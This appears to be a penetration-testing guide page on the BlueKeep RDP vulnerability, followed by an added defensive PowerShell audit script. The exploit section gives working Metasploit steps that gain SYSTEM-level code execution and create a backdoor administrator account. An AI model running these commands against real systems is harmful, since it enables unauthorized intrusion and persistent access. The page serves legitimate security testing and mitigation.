BlueKeep [CVE-2019-0708]

Table of contents

  1. Prerequisites
  2. Exploit
  3. Recommendations

The BlueKeep exploit is not stable and may crash the target.

Prerequisites

  • The target is a Windows host with the RDP port open (3389 by default).

Exploit

First, check whether the target is vulnerable using RDPScan.

rdpscan $target

To exploit a vulnerable target, run the following commands in Metasploit.

# Start metasploit.
msfconsole

# Look for bluekeep exploit.
search bluekeep

# Select the exploit module (exploit/windows/rdp/cve_2019_0708_bluekeep_rce) by its index in the search results, here 1.
use 1

# Select the payload (windows/x64/exec) by its index in the payload list, here 19.
show payloads
set payload 19

# Set up the exploit to check exploitability (should return local\SYSTEM).
set CMD whoami
set RHOSTS $target
run

# To gain administrative access.
set CMD net user $username $password /add; net localgroup Administrators $username /add
run

Recommendations

  • Update Windows computers to a version that is still supported by Microsoft.
  • Remove vulnerable Windows computers from the domain and put them in a WORKGROUP.
  • Isolate vulnerable Windows computers in a dedicated sub-network and restrict access to it.
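The following PowerShell script is an added example, not part of the original page or of any tool it mentions. It audits a Windows host for BlueKeep exposure (an OS version before Windows 8, i.e. 6.2, with Remote Desktop enabled) and, when run with -Restrict, implements the last recommendation above by limiting the built-in "Remote Desktop" inbound firewall rules to a management subnet. The subnet value is an assumed placeholder; the registry paths and the netsh syntax are the standard ones and work on Windows 7 / PowerShell 2.0, which is where vulnerable hosts typically live.

```powershell
# Added example (not from the original page): audit a host for BlueKeep exposure
# and optionally restrict inbound RDP to a management subnet. Run elevated.
param(
    # ASSUMPTION: replace with the address range of your own management network.
    [string]$ManagementSubnet = "10.0.0.0/24",
    # Only change the firewall scope when this switch is given; default is report-only.
    [switch]$Restrict
)

# Get-WmiObject (not Get-CimInstance) so the script also runs on PowerShell 2.0.
$os  = Get-WmiObject -Class Win32_OperatingSystem
$ver = [version]$os.Version

# BlueKeep affects Windows 7 / Server 2008 R2 (6.1) and older NT releases;
# Windows 8 / Server 2012 (6.2) and later are not affected.
$legacyOs = $ver -lt [version]"6.2"

# fDenyTSConnections = 0 means Remote Desktop connections are allowed.
$tsKey      = "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server"
$rdpEnabled = ((Get-ItemProperty -Path $tsKey).fDenyTSConnections -eq 0)

# The listening port; 3389 unless an administrator changed it.
$rdpPort = (Get-ItemProperty -Path "$tsKey\WinStations\RDP-Tcp").PortNumber

$report = New-Object PSObject -Property @{
    Host        = $env:COMPUTERNAME
    OSCaption   = $os.Caption
    OSVersion   = $os.Version
    LegacyOS    = $legacyOs
    RDPEnabled  = $rdpEnabled
    RDPPort     = $rdpPort
    # A legacy OS with RDP enabled is the case the recommendations above address.
    NeedsAction = ($legacyOs -and $rdpEnabled)
}
$report | Format-List Host, OSCaption, OSVersion, LegacyOS, RDPEnabled, RDPPort, NeedsAction

if ($Restrict -and $report.NeedsAction) {
    # Scope the built-in inbound "Remote Desktop" rule group to the management subnet.
    # Patching remains the real fix; this only reduces who can reach the port.
    netsh advfirewall firewall set rule group="Remote Desktop" dir=in new remoteip=$ManagementSubnet
    if ($LASTEXITCODE -eq 0) {
        Write-Host "Inbound RDP on $($env:COMPUTERNAME) is now limited to $ManagementSubnet"
    } else {
        Write-Warning "netsh returned exit code $LASTEXITCODE; firewall scope was not changed"
    }
}
```

Run it without arguments on each host first to collect the report; only hosts flagged NeedsAction need the -Restrict pass, and the restriction should be verified afterwards with "netsh advfirewall firewall show rule name=all dir=in" before relying on it.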